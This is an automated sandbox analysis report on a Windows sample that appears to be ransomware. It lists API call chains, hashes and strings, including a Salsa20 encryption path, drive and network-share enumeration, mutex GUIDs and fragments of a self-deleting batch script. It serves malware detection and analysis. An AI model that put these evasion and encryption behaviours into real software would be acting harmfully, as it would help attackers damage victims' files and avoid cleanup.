                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                        • String ID:
                                                                                                        • API String ID: 2560635915-0
                                                                                                        • Opcode ID: 2d81a2055eab71d7b7257419e570a5518ab6a0a1c05bbc45325dbe9d7b55d296
                                                                                                        • Instruction ID: 7948eee4ace612e91a50352321ed9569d9a1d2fbfb242b7f96af899953490228
                                                                                                        • Opcode Fuzzy Hash: 2d81a2055eab71d7b7257419e570a5518ab6a0a1c05bbc45325dbe9d7b55d296
                                                                                                        • Instruction Fuzzy Hash: C841F2715083409FC710DF69C885B8BBBE4BB84728F400A2DF085972A2DBB9D684CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2974526305-0
                                                                                                        • Opcode ID: 9e77ca378067106b382c1612874db5bfe6f7ab6856e5f5fd42cfca243cc5d73c
                                                                                                        • Instruction ID: 33088037b1fd7484daa76a5f0ccce5f8f07949c674f2f4f444154f68c3dd251a
                                                                                                        • Opcode Fuzzy Hash: 9e77ca378067106b382c1612874db5bfe6f7ab6856e5f5fd42cfca243cc5d73c
                                                                                                        • Instruction Fuzzy Hash: CF51C531E00325FBEB648FA9AC80A6E77B1AF11330F248729F835962D0D7759D60EB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00F1B1BA
                                                                                                          • Part of subcall function 00F111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00F1120F
                                                                                                          • Part of subcall function 00F111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00F11228
                                                                                                          • Part of subcall function 00F111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F1123D
                                                                                                          • Part of subcall function 00F111C0: MoveFileW.KERNEL32(00000000,?), ref: 00F11277
                                                                                                          • Part of subcall function 00F1BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00F1BA4A
                                                                                                          • Part of subcall function 00F1BA10: RegisterClassExW.USER32(00000030), ref: 00F1BA73
                                                                                                          • Part of subcall function 00F1BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F1BAAD
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B4B3
                                                                                                        • TranslateMessage.USER32(?), ref: 00F1B4CD
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F1B4D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                        • API String ID: 441990211-897913220
                                                                                                        • Opcode ID: e8b9c2b94cd052fa2b5cbf5ae29d9ad70ff1b79ccdffbf4fdfeb3df6417c3f76
                                                                                                        • Instruction ID: d82bcd62865a2e9ad23b4c97f511dc0c4988d460f181c32ca875a552796bf775
                                                                                                        • Opcode Fuzzy Hash: e8b9c2b94cd052fa2b5cbf5ae29d9ad70ff1b79ccdffbf4fdfeb3df6417c3f76
                                                                                                        • Instruction Fuzzy Hash: AC5156315182449BC718FB60DC529EFB3A8BF94344F40481DF546431A2EF38A69DEBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: __flush__getptd_noexit__lock_file__write
                                                                                                        • String ID:
                                                                                                        • API String ID: 1331135983-0
                                                                                                        • Opcode ID: 4879aebcc42f2cfd5c723612ec9454cad79d9c5c06f0274fcc7fc003bc5fb55c
                                                                                                        • Instruction ID: ede9920214ebcfdc2967ee7336b9bd1d838a96b134aca711b174821b6a4a890e
                                                                                                        • Opcode Fuzzy Hash: 4879aebcc42f2cfd5c723612ec9454cad79d9c5c06f0274fcc7fc003bc5fb55c
                                                                                                        • Instruction Fuzzy Hash: 85119433902F309AE6255AB4BC4276E3650AF42770F688749F4758E1C3CF6CAA43A751
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F0EF69
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _malloc.LIBCMT ref: 00F0EF85
                                                                                                        • _memset.LIBCMT ref: 00F0EF9B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$AllocateHeap_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3655941445-0
                                                                                                        • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                        • Instruction ID: d8c52d56de58004594d18a04730d87802c05dfda6ca03bf0eb1e76088de4d6f9
                                                                                                        • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                                                                                                        • Instruction Fuzzy Hash: 2D11C631500625EFCB10DF98D881A5ABBB5FF89311F2445A8E9489F396D731B912EBC1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F23B64
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • std::exception::exception.LIBCMT ref: 00F23B82
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F23B97
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 3074076210-0
                                                                                                        • Opcode ID: 3529db3f4e3d4fb8d617f98fb481c589fef1cca045bc6bccbc8293aef4f73ec0
                                                                                                        • Instruction ID: 38c08d8832767c3eb99f670b9b22d43516e993317738a8f447dc707fdd356075
                                                                                                        • Opcode Fuzzy Hash: 3529db3f4e3d4fb8d617f98fb481c589fef1cca045bc6bccbc8293aef4f73ec0
                                                                                                        • Instruction Fuzzy Hash: 24F0A47190022E66CB01AF98ED56EDEBBEC9F41320F10446AFC14A6182DFB99A44B6D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F54AE0: GetStdHandle.KERNEL32(000000F4,00F54C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F5480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00F51D37,00000000,00F0CDAE,00000001,00000001), ref: 00F54AFA
                                                                                                          • Part of subcall function 00F54AE0: GetFileType.KERNEL32(00000000), ref: 00F54B05
                                                                                                          • Part of subcall function 00F54AE0: __vfwprintf_p.LIBCMT ref: 00F54B27
                                                                                                        • _raise.LIBCMT ref: 00F54C18
                                                                                                          • Part of subcall function 00F2A12E: __getptd_noexit.LIBCMT ref: 00F2A16B
                                                                                                          • Part of subcall function 00F27CEC: _doexit.LIBCMT ref: 00F27CF6
                                                                                                        Strings
                                                                                                        • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00F54C0C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                        • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                        • API String ID: 2149077303-4210838268
                                                                                                        • Opcode ID: ce60fc87af435479b0b9ade8fbb6bb7a8f42ec9976ba02048b34f17a4ee1993c
                                                                                                        • Instruction ID: 9525902823f60ace3b26ec8d46812e71265220b9b56e69f6a145e841e7719736
                                                                                                        • Opcode Fuzzy Hash: ce60fc87af435479b0b9ade8fbb6bb7a8f42ec9976ba02048b34f17a4ee1993c
                                                                                                        • Instruction Fuzzy Hash: C6D09E79589310BFD9027B90EC07A0A7A52BF44714F448414F69E141A2D67A9134BB57
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                        • String ID:
                                                                                                        • API String ID: 2799698630-0
                                                                                                        • Opcode ID: f898615b2028a1ea5ead576c422e552e374223ba15db63b97e947938ff2161a4
                                                                                                        • Instruction ID: 399313b2224c33df3099687f10d276146351bd4dd872716286f63b7d8c0970bb
                                                                                                        • Opcode Fuzzy Hash: f898615b2028a1ea5ead576c422e552e374223ba15db63b97e947938ff2161a4
                                                                                                        • Instruction Fuzzy Hash: 1B519C71C05219DAEF20DB60DC467DEB7B5BF24318F0440A9D40D67291EB769AC8EF52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_file_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 26237723-0
                                                                                                        • Opcode ID: 2a1637c59abe8ba47795e2581ae266322740b582336e16b69e989e4a7043d5ad
                                                                                                        • Instruction ID: 0ad003107a6d75b8e24d137374347b4b36ce7c46e2a93ac044f3c3a18f032d67
                                                                                                        • Opcode Fuzzy Hash: 2a1637c59abe8ba47795e2581ae266322740b582336e16b69e989e4a7043d5ad
                                                                                                        • Instruction Fuzzy Hash: DE018431C01228FBCF62EFA5AC0299E7B61AF44370F184115F82856192DB3D8A62FB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        • __lock_file.LIBCMT ref: 00F23A7D
                                                                                                          • Part of subcall function 00F20E53: __lock.LIBCMT ref: 00F20E76
                                                                                                        • __fclose_nolock.LIBCMT ref: 00F23A88
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2800547568-0
                                                                                                        • Opcode ID: 2e6940cc6fd4845be5e121c3c5510e7d4f272c7be63b18a7410e4ae6b8261447
                                                                                                        • Instruction ID: e94de9637cf51a7a076916a35897defb9f30736e2d5369a5f510d439c9bcc5eb
                                                                                                        • Opcode Fuzzy Hash: 2e6940cc6fd4845be5e121c3c5510e7d4f272c7be63b18a7410e4ae6b8261447
                                                                                                        • Instruction Fuzzy Hash: F0F0BB72C01734AAD710BFB56C0275E7AA45F01734F158158E4A49B1C1CB7C9742BF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __lock_file.LIBCMT ref: 00F23489
                                                                                                        • __ftell_nolock.LIBCMT ref: 00F23494
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2999321469-0
                                                                                                        • Opcode ID: 79c5dabbc249625acfa82e48b62fa51392c8cb7c59f38a821cf709ab78fb9582
                                                                                                        • Instruction ID: 5f91bf2cc8a764b521ff846cc9c9d8b8bed2ba0e0341bccf67662ff2c969c90f
                                                                                                        • Opcode Fuzzy Hash: 79c5dabbc249625acfa82e48b62fa51392c8cb7c59f38a821cf709ab78fb9582
                                                                                                        • Instruction Fuzzy Hash: 3EF0A072902634EAD711FBB5BC0379E76A05F41334F254645F020AB1C2CF7C8B427AA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F118DD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00F118E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2443081362-0
                                                                                                        • Opcode ID: 96761cd34de632578c974b20183ed81c7f8f8a6ce9e3445f110dbc4587827f45
                                                                                                        • Instruction ID: 5aaaadf6a535f21383b86dc51207f462dd43bdb7d84725c66b01335ca3ba4d8a
                                                                                                        • Opcode Fuzzy Hash: 96761cd34de632578c974b20183ed81c7f8f8a6ce9e3445f110dbc4587827f45
                                                                                                        • Instruction Fuzzy Hash: CEE08636A415089BC7208B99ED81BDDB374F785730F204369D919732D047312D02AA94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F169DF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 120817956-0
                                                                                                        • Opcode ID: afc18ef408fcf9f2524690ddff664799ffd7ed2b12f68d1fb338309195cab982
                                                                                                        • Instruction ID: f333055b14a137d3a553ad47765288d932d718ec0a765c7fb8b6f16c7c4979e4
                                                                                                        • Opcode Fuzzy Hash: afc18ef408fcf9f2524690ddff664799ffd7ed2b12f68d1fb338309195cab982
                                                                                                        • Instruction Fuzzy Hash: 4C31D4B2E006059BCB20DF68C8816AEB7F8EF45720F20423DE856D7740DB359D449BE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F167E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                        • String ID:
                                                                                                        • API String ID: 120817956-0
                                                                                                        • Opcode ID: 02323cb7c5b0e01f289af39497244fed04d853e19cc3a3394fc64b6c593ef4cf
                                                                                                        • Instruction ID: 53c181fccd3b98768484814f3152a284be75ba02e951597ea7d3dbb961aba86d
                                                                                                        • Opcode Fuzzy Hash: 02323cb7c5b0e01f289af39497244fed04d853e19cc3a3394fc64b6c593ef4cf
                                                                                                        • Instruction Fuzzy Hash: 793101B1D006019BDB24CF68C8817AEBBE4EF44334F100A2DE426D77C0DB309A84D7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F165C5
                                                                                                          • Part of subcall function 00F23B4C: _malloc.LIBCMT ref: 00F23B64
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 657562460-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F13C40: _memset.LIBCMT ref: 00F13C83
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,-00000400,00000000,00000000,-00000400), ref: 00F128AA
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2800726579-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00F1FA25
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F10BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00F10C12
                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00F1FDA4
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1835186980-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F23B64
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 501242067-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,01029230), ref: 00F1FDD6
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __fsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3646066109-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __wfsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 197181222-0
                                                                                                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                        • Instruction ID: 8590b17707d81167c8cbe2808e4d4973a1cb605879bbc92e7433c18ce3f86bfa
                                                                                                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                        • Instruction Fuzzy Hash: 7FB0927244020C77CE012A82EC02A493B19AB516A0F008020FB0C18161A67BA6A0AA89
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _wcscmp.LIBCMT ref: 00F382B9
                                                                                                        • _wcscmp.LIBCMT ref: 00F382CA
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00F38568,?,00000000), ref: 00F382E6
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00F38568,?,00000000), ref: 00F38310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 1351282208-711371036
                                                                                                        • Opcode ID: 44a41eaa17246edc641224883b6278e227b5e086cba6c9d83fea3642535d10f2
                                                                                                        • Instruction ID: dd587b920b35929ffe6420cb01833f6eb5c8e1ac2a596b887e6845e98a49ae0f
                                                                                                        • Opcode Fuzzy Hash: 44a41eaa17246edc641224883b6278e227b5e086cba6c9d83fea3642535d10f2
                                                                                                        • Instruction Fuzzy Hash: 2C019232604719ABDB20AE58DC05FDA3798AF04BB1F048015F508DB151EF78DA42E7D4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00F0C090
                                                                                                        • input != nullptr && output != nullptr, xrefs: 00F0C095
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __wassert
                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                        • Opcode ID: 8d3a2d0e99c36641072cf294ddd89f0705eb0ed8dfcd87ed2615ef7f660ac56d
                                                                                                        • Instruction ID: 36e6984eb5a995af8468e9b3091a543b2bef292d4b22c0761be84f19d233dd2a
                                                                                                        • Opcode Fuzzy Hash: 8d3a2d0e99c36641072cf294ddd89f0705eb0ed8dfcd87ed2615ef7f660ac56d
                                                                                                        • Instruction Fuzzy Hash: 77C19E75E003199FCB54CFA9C881ADEFBF1FF48310F24856AE919E7201E334AA558B94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F124FE
                                                                                                        • GetLastError.KERNEL32 ref: 00F12509
                                                                                                        • CloseHandle.KERNEL32 ref: 00F1251C
                                                                                                        • CloseHandle.KERNEL32 ref: 00F12539
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00F12550
                                                                                                        • GetLastError.KERNEL32 ref: 00F1255B
                                                                                                        • CloseHandle.KERNEL32 ref: 00F1256E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2372642624-488272950
                                                                                                        • Opcode ID: 669ffe379c435a86fa4bf43696407c5c6b8ec2649a9a304e7e6f739b78ea2b77
                                                                                                        • Instruction ID: 086070976b961353fce506927634ce1d0f83745e825a0d0b48286ebd7f8be092
                                                                                                        • Opcode Fuzzy Hash: 669ffe379c435a86fa4bf43696407c5c6b8ec2649a9a304e7e6f739b78ea2b77
                                                                                                        • Instruction Fuzzy Hash: 7A71517294021CAADF60EBE1DC89FEA77ACFB44311F040596F609D7090DB799A88DF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32 ref: 00F11915
                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00F11932
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F11941
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F11948
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00F11956
                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00F11962
                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00F11974
